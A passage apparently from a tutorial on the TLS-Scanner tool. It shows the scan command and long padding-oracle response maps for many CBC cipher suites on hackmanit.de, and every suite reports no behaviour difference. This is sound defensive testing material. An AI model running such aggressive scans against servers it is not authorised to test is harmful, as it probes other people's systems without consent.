	TLS_DHE_RSA_WITH_AES_256_CBC_SHA - TLS11 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS11 - No Behavior Difference
	TLS_RSA_WITH_AES_256_CBC_SHA - TLS11 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS11 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_RSA_WITH_AES_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS11 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 - TLS12 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_RSA_WITH_AES_256_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_RSA_WITH_AES_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS12 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA - TLS12 - No Behavior Difference
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS12 - No Behavior Difference
	TLS_RSA_WITH_AES_128_CBC_SHA256 - TLS12 - No Behavior Difference
	TLS_RSA_WITH_AES_128_CBC_SHA - TLS12 - No Behavior Difference
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS12 - No Behavior Difference

view raw gistfile1.txt hosted with ❤ by GitHub

If we want, we can also look at the concrete responses of the server. For this purpose, we start the scanner with the -reportDetail flag:

java -jar TLS-Scanner -connect hackmanit.de -threads 15 -aggressive 100 -reportDetail ALL

view raw gistfile1.txt hosted with ❤ by GitHub

With this flag we now get the following details:

	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_AES_256_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_AES_128_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS10 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_AES_256_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
